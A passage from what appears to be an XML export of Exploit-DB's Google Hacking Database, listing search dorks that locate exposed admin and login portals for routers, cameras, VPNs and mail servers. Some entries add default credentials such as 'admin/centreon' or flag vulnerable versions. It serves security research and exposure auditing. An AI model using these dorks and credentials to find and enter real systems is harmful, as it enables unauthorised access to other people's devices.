<textualDescription>This query reveals login pages for the administration of XcAuction and XcClassified Lite..&quot;XcAuction is a powerful and complete auction package that allows you to add auction capabilities to any web site.&quot;&quot;XcClassified allows you to offer free or fee based classified ads to your site visitors. It integrates easily into your existing web site design and offers many features.&quot;</textualDescription>
<query>intitle:&quot;XcAuctionLite&quot; | &quot;DRIVEN BY XCENT&quot; Lite inurl:admin</query>
<querystring>https://www.google.com/search?q=intitle%3A%22XcAuctionLite%22+%7C+%22DRIVEN+BY+XCENT%22+Lite+inurl%3Aadmin</querystring>
<edb></edb>
<date>2005-06-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>6675</id>
<link>https://www.exploit-db.com/ghdb/6675</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Xenmobile Console Logon&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Xenmobile Console Logon&quot;
# Date: 11/17/2020
# Exploit Author: Javier Bernardo
# Homepage: https://www.hack.com.ar
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
Email: javierbernardo001@gmail.com | Website: hack.com.ar
Buenos Aires - Argentina
</textualDescription>
<query>intitle:&quot;Xenmobile Console Logon&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Xenmobile Console Logon&quot;</querystring>
<edb></edb>
<date>2020-11-17</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>5515</id>
<link>https://www.exploit-db.com/ghdb/5515</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;XENON :: Login&quot;</shortDescription>
<textualDescription>Login Portal:
intitle:&quot;XENON :: Login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;XENON :: Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;XENON :: Login&quot;</querystring>
<edb></edb>
<date>2019-09-10</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>1018</id>
<link>https://www.exploit-db.com/ghdb/1018</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;XMail Web Administration Interface&quot; intext:Login intext:password</shortDescription>
<textualDescription>This search will find the Web Administration Interface for servers running XMail.&quot;XMail is an Internet and intranet mail server featuring an SMTP server, POP3 server, finger server, multiple domains, no need for users to have a real system account, SMTP relay checking&quot;, etc...</textualDescription>
<query>intitle:&quot;XMail Web Administration Interface&quot; intext:Login intext:password</query>
<querystring>https://www.google.com/search?q=intitle:%22XMail+Web+Administration+Interface%22+intext:Login+intext:password</querystring>
<edb></edb>
<date>2005-06-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>7015</id>
<link>https://www.exploit-db.com/ghdb/7015</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;XVR LOGIN&quot; inurl:&quot;/login.rsp&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;XVR LOGIN&quot; inurl:&quot;/login.rsp&quot;
# Pages containing login portals.
# Date: 29/06/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;XVR LOGIN&quot; inurl:&quot;/login.rsp&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;XVR LOGIN&quot; inurl:&quot;/login.rsp&quot;</querystring>
<edb></edb>
<date>2021-07-02</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5680</id>
<link>https://www.exploit-db.com/ghdb/5680</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Zabbix&quot; intext:&quot;username&quot; intext:&quot;password&quot; inurl:&quot;/zabbix/index.php&quot;</shortDescription>
<textualDescription>Zabbix Login Portal:
intitle:&quot;Zabbix&quot; intext:&quot;username&quot; intext:&quot;password&quot;
inurl:&quot;/zabbix/index.php&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;Zabbix&quot; intext:&quot;username&quot; intext:&quot;password&quot; inurl:&quot;/zabbix/index.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Zabbix&quot; intext:&quot;username&quot; intext:&quot;password&quot; inurl:&quot;/zabbix/index.php&quot;</querystring>
<edb></edb>
<date>2020-01-06</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>3945</id>
<link>https://www.exploit-db.com/ghdb/3945</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Zimbra Web Client Log In&quot;</shortDescription>
<textualDescription>Open Source Zimbra Webmail Login pages</textualDescription>
<query>intitle:&quot;Zimbra Web Client Log In&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Zimbra Web Client Log In&quot;</querystring>
<edb></edb>
<date>2014-04-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>3944</id>
<link>https://www.exploit-db.com/ghdb/3944</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Zimbra Web Client Sign In&quot;</shortDescription>
<textualDescription>Open Source Zimbra Webmail Login pages</textualDescription>
<query>intitle:&quot;Zimbra Web Client Sign In&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Zimbra Web Client Sign In&quot;</querystring>
<edb></edb>
<date>2014-04-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>7216</id>
<link>https://www.exploit-db.com/ghdb/7216</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Zimbra Web Client Sign In&quot; &quot;Synacor&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Zimbra Web Client Sign In&quot; &quot;Synacor&quot;
# Pages Containing Login Portals
# Date: 12/09/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Zimbra Web Client Sign In&quot; &quot;Synacor&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Zimbra Web Client Sign In&quot; &quot;Synacor&quot;</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>948</id>
<link>https://www.exploit-db.com/ghdb/948</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Zope Help System&quot; inurl:HelpSys</shortDescription>
<textualDescription>By itself, this returns Zope's help pages. Manipulation of the URL, changing 'HelpSys' to 'manage', gives a link to a server's Zope Management Interface. While this requires authentication, sometimes overly revealing error messages are returned.</textualDescription>
<query>intitle:&quot;Zope Help System&quot; inurl:HelpSys</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Zope+Help+System%22+inurl%3AHelpSys</querystring>
<edb></edb>
<date>2005-04-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>6798</id>
<link>https://www.exploit-db.com/ghdb/6798</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;ZXHN H108N&quot; intext:&quot;Welcome to ZXHN H108N&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;ZXHN H108N&quot; intext:&quot;Welcome to ZXHN H108N&quot;</textualDescription>
<query>intitle:&quot;ZXHN H108N&quot; intext:&quot;Welcome to ZXHN H108N&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;ZXHN H108N&quot; intext:&quot;Welcome to ZXHN H108N&quot;</querystring>
<edb></edb>
<date>2021-02-16</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>270</id>
<link>https://www.exploit-db.com/ghdb/270</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;ZyXEL Prestige Router&quot; &quot;Enter password&quot;</shortDescription>
<textualDescription>This is the main authentication screen for the ZyXEL Prestige Router.</textualDescription>
<query>intitle:&quot;ZyXEL Prestige Router&quot; &quot;Enter password&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22ZyXEL+Prestige+Router%22+%22Enter+password%22+</querystring>
<edb></edb>
<date>2004-06-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>938</id>
<link>https://www.exploit-db.com/ghdb/938</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&amp;quot;inc. vpn 3000 concentrator&amp;quot;</shortDescription>
<textualDescription>This search will show the login page for Cisco VPN 3000 concentrators. Since the default user id and password are readily available on the Cisco website, an out-of-the-box or test device could be wide open to mischief.</textualDescription>
<query>intitle:&quot;inc. vpn 3000 concentrator&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22inc.+vpn+3000+concentrator%22&amp;num=30&amp;safe=off&amp;rls=org.mozilla:en-US:official&amp;filter=0</querystring>
<edb></edb>
<date>2005-04-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>5154</id>
<link>https://www.exploit-db.com/ghdb/5154</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:'Centreon - IT &amp; Network Monitoring'</shortDescription>
<textualDescription>*Search: * Centreon - IT &amp; Network Monitoring Login
*Google Dorks: *intitle:'Centreon - IT &amp; Network Monitoring'
*Default Credentials:* admin/centreon
*Author:* Rishabh Sharma (Lazy Hacker)
</textualDescription>
<query>intitle:'Centreon - IT &amp; Network Monitoring'</query>
<querystring>https://www.google.com/search?q=intitle:'Centreon - IT &amp; Network Monitoring'</querystring>
<edb></edb>
<date>2019-03-11</date>
<author>Lazy Hacker</author>
</entry>
<entry>
<id>8020</id>
<link>https://www.exploit-db.com/ghdb/8020</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:'olt web management interface'</shortDescription>
<textualDescription># Google Dork: intitle:'olt web management interface'
# Pages Containing Login Portals
# Date: 08/07/2021
# Exploit Author: Cyber Shelby</textualDescription>
<query>intitle:'olt web management interface'</query>
<querystring>https://www.google.com/search?q=intitle:'olt web management interface'</querystring>
<edb></edb>
<date>2022-08-17</date>
<author>Cyber Shelby</author>
</entry>
<entry>
<id>1357</id>
<link>https://www.exploit-db.com/ghdb/1357</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:(&quot;TrackerCam Live Video&quot;)|(&quot;TrackerCam Application Login&quot;)|(&quot;Trackercam Remote&quot;) -trackercam.com</shortDescription>
<textualDescription>&quot;TrackerCamÂî is a software application that lets you put your webcam on the web, use it for surveillance, and do things like access its video from a cell phone or upload its images to an FTP-server.&quot;</textualDescription>
<query>intitle:(&quot;TrackerCam Live Video&quot;)|(&quot;TrackerCam Application Login&quot;)|(&quot;Trackercam Remote&quot;) -trackercam.com</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%28%22TrackerCam+Live+Video%22%29%7C%28%22TrackerCam+Application+Login%22%29%7C%28%22Trackercam+Remote%22%29+-trackercam.com</querystring>
<edb></edb>
<date>2006-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>6243</id>
<link>https://www.exploit-db.com/ghdb/6243</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:.*edu/login</shortDescription>
<textualDescription>Dork: intitle:.*edu/login
Description: This google dorks lists out edu website login portals.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:.*edu/login</query>
<querystring>https://www.google.com/search?q=intitle:.*edu/login</querystring>
<edb></edb>
<date>2020-06-08</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5160</id>
<link>https://www.exploit-db.com/ghdb/5160</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:.:: Welcome to the Web-Based Configurator::.</shortDescription>
<textualDescription>Search: zyxel Router Login Page
Google Dorks: intitle:.:: Welcome to the Web-Based Configurator::.
Category : Various Online Devices
Exploit Author:- Harsh Mukeshbhai Joshi
</textualDescription>
<query>intitle:.:: Welcome to the Web-Based Configurator::.</query>
<querystring>https://www.google.com/search?q=intitle:.:: Welcome to the Web-Based Configurator::.</querystring>
<edb></edb>
<date>2019-03-22</date>
<author>Inspira Enterprise Pvt Ltd</author>
</entry>
<entry>
<id>4720</id>
<link>https://www.exploit-db.com/ghdb/4720</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:access your account&quot; login</shortDescription>
<textualDescription>Login and admin portals
Bruno Schmid
</textualDescription>
<query>intitle:access your account&quot; login</query>
<querystring>https://www.google.com/search?q=intitle:access your account&quot; login</querystring>
<edb></edb>
<date>2018-03-30</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>3936</id>
<link>https://www.exploit-db.com/ghdb/3936</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Admin inurl:login.php site:.co.in</shortDescription>
<textualDescription>dork submitted by M4RKM3N aka Osama Mahmood
revels admin login panels of sites :)</textualDescription>
<query>intitle:Admin inurl:login.php site:.co.in</query>
<querystring>https://www.google.com/search?q=intitle:Admin inurl:login.php site:.co.in</querystring>
<edb></edb>
<date>2014-02-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>7304</id>
<link>https://www.exploit-db.com/ghdb/7304</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:administration intext:&quot;portail&quot; &quot;Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:administration intext:&quot;portail&quot; &quot;Login&quot;
# Pages Containing Login Portals
# Date: 24/09/2021
# Exploit Author: Neha Singh
</textualDescription>
<query>intitle:administration intext:&quot;portail&quot; &quot;Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:administration intext:&quot;portail&quot; &quot;Login&quot;</querystring>
<edb></edb>
<date>2021-09-27</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>6221</id>
<link>https://www.exploit-db.com/ghdb/6221</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:adminlogin inurl:login</shortDescription>
<textualDescription>#Google Dork:- intitle:adminlogin inurl:login
#Description: This Page Contains Various Admin login Pages for a web
server.
#Author: Md Anzaruddin
Linkedin: https://www.linkedin.com/in/mdanzaruddin/
Twitter:https://twitter.com/mdanzaruddin
#Date: 04-June-2020
---
Regards:
Md Anzaruddin
</textualDescription>
<query>intitle:adminlogin inurl:login</query>
<querystring>https://www.google.com/search?q=intitle:adminlogin inurl:login</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Md Anzaruddin</author>
</entry>
<entry>
<id>1396</id>
<link>https://www.exploit-db.com/ghdb/1396</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Ampache intitle:&quot;love of music&quot; password | login | &quot;Remember Me.&quot; -welcome</shortDescription>
<textualDescription>Ampache is a Web-based MP3/Ogg/RM/Flac/WMA/M4A manager. It allows you to view, edit, and play your audio files via HTTP/IceCast/Mpd or Moosic. It has support for downsampling, playlists, artist, and album views, album art, random play, song play tracking, user themes, and remote catalogs using XML-RPC.</textualDescription>
<query>intitle:Ampache intitle:&quot;love of music&quot; password | login | &quot;Remember Me.&quot; -welcome</query>
<querystring>https://www.google.com/search?q=intitle:Ampache+intitle:%22love+of+music%22++password+%7C+login+%7C+%22Remember+Me.%22+-welcome&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-06-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>4130</id>
<link>https://www.exploit-db.com/ghdb/4130</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:AP Router New Generation | inurl:/home.asp</shortDescription>
<textualDescription>Access Point Router Logins
-Xploit </textualDescription>
<query>intitle:AP Router New Generation | inurl:/home.asp</query>
<querystring>https://www.google.com/search?q=intitle:AP Router New Generation | inurl:/home.asp</querystring>
<edb></edb>
<date>2015-11-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>1423</id>
<link>https://www.exploit-db.com/ghdb/1423</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:ARI &quot;Phone System Administrator&quot;</shortDescription>
<textualDescription>Login page for &quot;Asterisk Recording Interface&quot; (ARI).</textualDescription>
<query>intitle:ARI &quot;Phone System Administrator&quot;</query>
<querystring>https://www.google.com/search?q=intitle:ARI+%22Phone+System+Administrator%22&amp;filter=0&amp;num=100</querystring>
<edb></edb>
<date>2006-10-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>915</id>
<link>https://www.exploit-db.com/ghdb/915</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:asterisk.management.portal web-access</shortDescription>
<textualDescription>VOXBOX Asterisk web management. Allows to manage Asterisk configuration like calls and SIP settings.</textualDescription>
<query>intitle:asterisk.management.portal web-access</query>
<querystring>https://www.google.com/search?q=intitle%3Aasterisk.management.portal+web-access&amp;c2coff=1&amp;rls=org.mozilla%3Aen-US%3Aofficial</querystring>
<edb></edb>
<date>2005-03-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>5704</id>
<link>https://www.exploit-db.com/ghdb/5704</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Check_MK Multisite Login</shortDescription>
<textualDescription>Dork for search Checkmk:
Checkmk has long been available as an open source IT monitoring solution, supported by a large user community
Author:
UsmanAliMaan
</textualDescription>
<query>intitle:Check_MK Multisite Login</query>
<querystring>https://www.google.com/search?q=intitle:Check_MK Multisite Login</querystring>
<edb></edb>
<date>2020-01-27</date>
<author>UsmanAliMaan</author>
</entry>
<entry>
<id>7441</id>
<link>https://www.exploit-db.com/ghdb/7441</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:cisco &quot;This is a restricted Access Server&quot;</shortDescription>
<textualDescription># Google Dork: intitle:cisco &quot;This is a restricted Access Server&quot;
# Pages Containing Login Portals
# Date:14/10/2021
# Exploit Author: César Hernández Obispo</textualDescription>
<query>intitle:cisco &quot;This is a restricted Access Server&quot;</query>
<querystring>https://www.google.com/search?q=intitle:cisco &quot;This is a restricted Access Server&quot;</querystring>
<edb></edb>
<date>2021-10-18</date>
<author>César Hernández Obispo</author>
</entry>
<entry>
<id>4716</id>
<link>https://www.exploit-db.com/ghdb/4716</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Control Panel &quot;Login with your username and password below.&quot; +&quot;Email&quot; +&quot;Powered by&quot;</shortDescription>
<textualDescription>*What: *Vulnerable Interspire Email Marketer installs and their login pages.
The dork from the recently published paper
https://security.infoteam.ch/en/blog/posts/from-hacked-client-to-0day-discovery.html
*By: *edm0nd
https://twitter.com/Edmond_Major
</textualDescription>
<query>intitle:Control Panel &quot;Login with your username and password below.&quot; +&quot;Email&quot; +&quot;Powered by&quot;</query>
<querystring>https://www.google.com/search?q=intitle:Control Panel &quot;Login with your username and password below.&quot; +&quot;Email&quot; +&quot;Powered by&quot;</querystring>
<edb></edb>
<date>2018-03-28</date>
<author>edm0nd</author>
</entry>
<entry>
<id>5438</id>
<link>https://www.exploit-db.com/ghdb/5438</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:dotCMS inurl:dotAdmin</shortDescription>
<textualDescription>DotCMS login pages
# Google Dork: intitle:dotCMS inurl:dotAdmin
# Date: [22-08-2019]
# Author: [Mohammed*_*]
</textualDescription>
<query>intitle:dotCMS inurl:dotAdmin</query>
<querystring>https://www.google.com/search?q=intitle:dotCMS inurl:dotAdmin</querystring>
<edb></edb>
<date>2019-08-22</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>924</id>
<link>https://www.exploit-db.com/ghdb/924</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:endymion.sak̮̩.mail.login.page | inurl:sake.servlet</shortDescription>
<textualDescription>sak̮̩ Mail, servlet-based web email system, designed for scaling to large numbers of concurrent users. Intended for large universities or enterprise-level mail system</textualDescription>
<query>intitle:endymion.sak̮̩.mail.login.page | inurl:sake.servlet</query>
<querystring>https://www.google.com/search?q=intitle%3Aendymion.sak%C3%A9.mail.login.page+%7C+inurl%3Asake.servlet&amp;num=100</querystring>
<edb></edb>
<date>2005-03-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>4133</id>
<link>https://www.exploit-db.com/ghdb/4133</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:FootPrints Login | inurl:/MRcgi/MRentrancePage.pl</shortDescription>
<textualDescription>Numara Software FootPrints Logins
-Xploit</textualDescription>
<query>intitle:FootPrints Login | inurl:/MRcgi/MRentrancePage.pl</query>
<querystring>https://www.google.com/search?q=intitle:FootPrints Login | inurl:/MRcgi/MRentrancePage.pl</querystring>
<edb></edb>
<date>2015-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>3967</id>
<link>https://www.exploit-db.com/ghdb/3967</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:FRITZ!Box inurl:login.lua</shortDescription>
<textualDescription>Show open FritzBox-Router with
intitle:FRITZ!Box inurl:login.lua</textualDescription>
<query>intitle:FRITZ!Box inurl:login.lua</query>
<querystring>https://www.google.com/search?q=intitle:FRITZ!Box inurl:login.lua</querystring>
<edb></edb>
<date>2014-10-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>843</id>
<link>https://www.exploit-db.com/ghdb/843</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Group-Office &quot;Enter your username and password to login&quot;</shortDescription>
<textualDescription>Group-Office is a Groupware suite containing a base system and different modules. The modules are designed in a way that groups of people can collaborate online.</textualDescription>
<query>intitle:Group-Office &quot;Enter your username and password to login&quot;</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=intitle%3AGroup-Office+%22Enter+your+username+and+password+to+login%22</querystring>
<edb></edb>
<date>2005-01-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>7509</id>
<link>https://www.exploit-db.com/ghdb/7509</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Hikvision login page</shortDescription>
<textualDescription># Google Dork: intitle:Hikvision login page
# Pages Containing Login Portals
# Date:28/10/2021
# Exploit Author: jawhar milkan</textualDescription>
<query>intitle:Hikvision login page</query>
<querystring>https://www.google.com/search?q=intitle:Hikvision login page</querystring>
<edb></edb>
<date>2021-10-28</date>
<author>jawhar milkan</author>
</entry>
<entry>
<id>4063</id>
<link>https://www.exploit-db.com/ghdb/4063</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:IBM Lotus iNotes Login</shortDescription>
<textualDescription>Thanks,
Xploit </textualDescription>
<query>intitle:IBM Lotus iNotes Login</query>
<querystring>https://www.google.com/search?q=intitle:IBM Lotus iNotes Login</querystring>
<edb></edb>
<date>2015-08-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>7845</id>
<link>https://www.exploit-db.com/ghdb/7845</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:iDRAC* inurl:login.html</shortDescription>
<textualDescription># Google Dork: intitle:iDRAC* inurl:login.html
# Pages Containing Login Portals
# Date:14/06/2022
# Exploit Author: Javier Bernardo</textualDescription>
<query>intitle:iDRAC* inurl:login.html</query>
<querystring>https://www.google.com/search?q=intitle:iDRAC* inurl:login.html</querystring>
<edb></edb>
<date>2022-06-14</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>941</id>
<link>https://www.exploit-db.com/ghdb/941</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:ilohamail &quot;Powered by IlohaMail&quot;</shortDescription>
<textualDescription>IlohaMail is a light-weight yet feature rich multilingual webmail system designed for ease of use, written in pure PHP. It supports web-access to IMAP and POP3 accounts, and includes a complete contacts feature and other PIM features.</textualDescription>
<query>intitle:ilohamail &quot;Powered by IlohaMail&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3Ailohamail+%22Powered+by+IlohaMail%22</querystring>
<edb></edb>
<date>2005-04-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>940</id>
<link>https://www.exploit-db.com/ghdb/940</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:ilohamail intext:&quot;Version 0.8.10&quot; &quot;Powered by IlohaMail&quot;</shortDescription>
<textualDescription>some version of ilohamail are vulnerable.</textualDescription>
<query>intitle:ilohamail intext:&quot;Version 0.8.10&quot; &quot;Powered by IlohaMail&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3Ailohamail+intext%3A%22Version+0.8.10%22+%22Powered+by+IlohaMail%22</querystring>
<edb></edb>
<date>2005-04-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>1360</id>
<link>https://www.exploit-db.com/ghdb/1360</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:IMP inurl:imp/index.php3</shortDescription>
<textualDescription>Webmail Login pages for IMP&quot;IMP is a set of PHP scripts that implement an IMAP based webmail system. Assuming you have an account on a server that supports IMAP, you can use an installation of IMP to check your mail from anywhere that you have web access.&quot;</textualDescription>
<query>intitle:IMP inurl:imp/index.php3</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3AIMP+inurl%3Aimp%2Findex.php3</querystring>
<edb></edb>
<date>2006-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>7510</id>
<link>https://www.exploit-db.com/ghdb/7510</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:ip camera login page</shortDescription>
<textualDescription># Google Dork: intitle:ip camera login page
# Pages Containing Login Portals
# Date:28/10/2021
# Exploit Author: jawhar milkan</textualDescription>
<query>intitle:ip camera login page</query>
<querystring>https://www.google.com/search?q=intitle:ip camera login page</querystring>
<edb></edb>
<date>2021-10-28</date>
<author>jawhar milkan</author>
</entry>
<entry>
<id>6955</id>
<link>https://www.exploit-db.com/ghdb/6955</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:LANCOM intitle:login &quot;LANCOM Systems GmbH&quot;</shortDescription>
<textualDescription># Exploit Title: Various Online Devices
# Google Dork: intitle:LANCOM intitle:login &quot;LANCOM Systems GmbH&quot;
# Date: 2021-05-20
# Exploit Author: Anmol K Sachan
</textualDescription>
<query>intitle:LANCOM intitle:login &quot;LANCOM Systems GmbH&quot;</query>
<querystring>https://www.google.com/search?q=intitle:LANCOM intitle:login &quot;LANCOM Systems GmbH&quot;</querystring>
<edb></edb>
<date>2021-05-25</date>
<author>Anmol K Sachan</author>
</entry>
<entry>
<id>4390</id>
<link>https://www.exploit-db.com/ghdb/4390</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Login &quot;Login to pfSense&quot; &quot;Password&quot; &quot;LLC&quot;</shortDescription>
<textualDescription>Google Dork: intitle:Login &quot;Login to pfSense&quot; &quot;Password&quot; &quot;LLC&quot;
#Title: pfSense firewall administrative login page
#Author: Simon Gurney
#Website: blog.synack.co.uk
Admin login pages for pfSense firewalls.
</textualDescription>
<query>intitle:Login &quot;Login to pfSense&quot; &quot;Password&quot; &quot;LLC&quot;</query>
<querystring>https://www.google.com/search?q=intitle:Login &quot;Login to pfSense&quot; &quot;Password&quot; &quot;LLC&quot;</querystring>
<edb></edb>
<date>2017-02-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>4971</id>
<link>https://www.exploit-db.com/ghdb/4971</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:login &quot;recruiter&quot; | &quot;employer&quot; | &quot;candidate&quot;</shortDescription>
<textualDescription>Recruitment and employers login portals.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:login &quot;recruiter&quot; | &quot;employer&quot; | &quot;candidate&quot;</query>
<querystring>https://www.google.com/search?q=intitle:login &quot;recruiter&quot; | &quot;employer&quot; | &quot;candidate&quot;</querystring>
<edb></edb>
<date>2018-10-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>444</id>
<link>https://www.exploit-db.com/ghdb/444</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Login * Webmailer</shortDescription>
<textualDescription>1&amp;1 Webmail login portals. This is made by a german company called Internet United active in the hosting providers area. They have a server login product wich can be found by GooglingThis is all not very exiting as there have been no vulnerabilities reported on this software yet.</textualDescription>
<query>intitle:Login * Webmailer</query>
<querystring>https://www.google.com/search?q=intitle%3ALogin+1%261+Webmailer&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-08-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>5502</id>
<link>https://www.exploit-db.com/ghdb/5502</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:login enterprise</shortDescription>
<textualDescription>Enterprise login portals
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:login enterprise</query>
<querystring>https://www.google.com/search?q=intitle:login enterprise</querystring>
<edb></edb>
<date>2019-09-04</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>787</id>
<link>https://www.exploit-db.com/ghdb/787</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Login intext:&quot;RT is © Copyright&quot;</shortDescription>
<textualDescription>RT is an enterprise-grade ticketing system which enables a group of people to intelligently and efficiently manage tasks, issues, and requests submitted by a community of users.Versions including 2.0.13 are vulnerable to injection, check outSecurityFocus BID 7509</textualDescription>
<query>intitle:Login intext:&quot;RT is © Copyright&quot;</query>
<querystring>https://www.google.com/search?q=intitle:Login intext:&quot;RT is © Copyright&quot;</querystring>
<edb></edb>
<date>2004-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>6750</id>
<link>https://www.exploit-db.com/ghdb/6750</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Login intext:HIKVISION inurl:login.asp?</shortDescription>
<textualDescription>Category: Pages Containing Login Portals
Nicholas Doropoulos</textualDescription>
<query>intitle:Login intext:HIKVISION inurl:login.asp?</query>
<querystring>https://www.google.com/search?q=intitle:Login intext:HIKVISION inurl:login.asp?</querystring>
<edb></edb>
<date>2021-01-07</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>4965</id>
<link>https://www.exploit-db.com/ghdb/4965</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Login inurl:login.php intext:admin/admin</shortDescription>
<textualDescription>intitle:Login inurl:login.php intext:admin/admin
This Google Dork discovers login portals with weak default passwords.
- Gionathan &quot;John&quot; Reale (https://www.exploit-db.com/author/?a=9609)
</textualDescription>
<query>intitle:Login inurl:login.php intext:admin/admin</query>
<querystring>https://www.google.com/search?q=intitle:Login inurl:login.php intext:admin/admin</querystring>
<edb></edb>
<date>2018-09-26</date>
<author>Gionathan Reale</author>
</entry>
<entry>
<id>4824</id>
<link>https://www.exploit-db.com/ghdb/4824</link>
